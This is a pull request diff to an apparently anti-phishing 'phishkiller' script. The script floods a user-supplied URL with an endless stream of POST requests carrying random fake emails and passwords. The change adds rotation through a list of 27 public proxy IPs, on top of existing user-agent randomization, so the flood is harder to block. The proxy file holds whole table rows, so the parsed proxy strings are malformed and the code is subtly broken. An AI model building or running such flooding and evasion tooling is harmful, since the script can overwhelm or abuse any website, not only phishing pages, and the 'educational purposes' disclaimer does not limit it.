### PR TITLE
Add Proxies and Randomly Select

### DIFF
--- a/phishkiller.py
+++ b/phishkiller.py
@@ -32,7 +32,15 @@ def generate_random_email():
 def generate_random_password():
     return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(8))
 
+import random
+
 def send_posts(url):
+    with open("proxies.txt", "r") as f:
+        proxies = f.readlines()
+
+    # Remove newline characters from the end of each line
+    proxies = [p.strip() for p in proxies]
+
     while True:
         email = generate_random_email()
         password = generate_random_password()
@@ -40,8 +48,15 @@ def send_posts(url):
         ua = UserAgent()
         user_agent = ua.random
         headers = {'User-Agent': user_agent}
-        response = requests.post(url, data=data, headers=headers,)
-        print(f"Email: {email}, Password: {password}, Status Code: {response.status_code}, headers: {user_agent}")
+
+        # Select a random proxy from the list
+        proxy = random.choice(proxies)
+
+        # Use the proxy for the request
+        response = requests.post(url, data=data, headers=headers, proxies={"http": f"http://{proxy}"})
+
+        print(f"Email: {email}, Password: {password}, Status Code: {response.status_code}, headers: {user_agent}, Proxy: {proxy}")
+
 
 def main():
     url = input("Enter the URL of the target you want to flood: ")

--- a/proxies.txt
+++ b/proxies.txt
@@ -1,0 +1,27 @@
+154.203.132.49	8090	1 min ago	2235 ms	43% (7)	sc Seychelles	Elite
+116.63.129.202	6000	1 min ago	1563 ms	86% (7)	cn China	Elite
+189.240.60.166	9090	1 min ago	3108 ms	54% (13)	mx Mexico - Mexico City	Elite
+47.96.176.130	59394	1 min ago	960 ms	23% (9)	cn China - Hangzhou	Elite
+20.205.61.143	8123	1 min ago	2020 ms	84% (6)	hk Hong Kong - Hong Kong	Elite
+64.227.4.244	8888	1 min ago	85 ms	50% (16)	us United States - North Bergen	Elite
+185.241.149.164	8080	1 min ago	487 ms	28% (11)	us United States - Dallas	Elite
+20.24.43.214	80	1 min ago	1084 ms	78% (9)	sg Singapore - Singapore	Elite
+20.206.106.192	80	1 min ago	1268 ms	84% (6)	br Brazil - Campinas	Elite
+3.78.92.159	80	1 min ago	241 ms	88% (8)	de Germany - Frankfurt am Main	Elite
+13.38.176.104	3128	1 min ago	190 ms	88% (8)	fr France - Paris	Elite
+3.123.150.192	3128	1 min ago	237 ms	86% (7)	de Germany - Frankfurt am Main	Elite
+3.37.125.76	3128	1 min ago	390 ms	72% (7)	kr South Korea - Incheon	Elite
+154.16.146.44	80	1 min ago	395 ms	50% (2)	us United States - Buffalo	Elite
+154.203.132.49	8080	2 mins ago	1383 ms	59% (12)	sc Seychelles	Elite
+109.110.162.8	80	2 mins ago	1136 ms	100% (12)	hk Hong Kong - Ha Kwai Chung	Elite
+39.109.113.97	3128	2 mins ago	3257 ms	50% (8)	hk Hong Kong	Elite
+189.240.60.164	9090	2 mins ago	2420 ms	67% (6)	mx Mexico - Benito Juarez	Elite
+24.240.126.108	80	2 mins ago	1145 ms	78% (9)	au Australia - Melbourne	Elite
+111.160.204.146	9091	2 mins ago	1496 ms	54% (13)	cn China	Elite
+125.77.25.178	8090	2 mins ago	1940 ms	88% (8)	cn China - Fuzhou	Elite
+189.240.60.163	9090	2 mins ago	2493 ms	56% (9)	mx Mexico - Mexico City	Elite
+3.126.147.182	80	2 mins ago	228 ms	80% (10)	de Germany - Frankfurt am Main	Elite
+189.240.60.171	9090	2 mins ago	2201 ms	56% (9)	mx Mexico - Mexico City	Elite
+154.203.132.55	8080	3 mins ago	4105 ms	60% (5)	sc Seychelles	Elite
+3.21.101.158	3128	3 mins ago	137 ms	86% (7)	us United States - Columbus	Elite
+3.127.121.101	80	3 mins ago	190 ms	89% (9)	de Germany - Frankfurt am Main	Elite


### PR DESCRIPTION
This pull request adds support for rotating proxies to the original script. The modified send_posts function now reads a list of proxies from a file called proxies.txt and selects a random proxy from the list for each request. The random module's choice function is used to select a random proxy. The proxies list is read from the proxies.txt file, with newline characters removed, and each proxy is passed to the requests.post function as an HTTP proxy.
Please note that this code is for educational and testing purposes only, and should not be used for any malicious or illegal activities. Using this code for any unauthorized purpose may violate the terms of service of the target website, as well as local and international laws. The use of this code is entirely at your own risk, and the author and contributors are not responsible for any misuse or consequences arising from its use.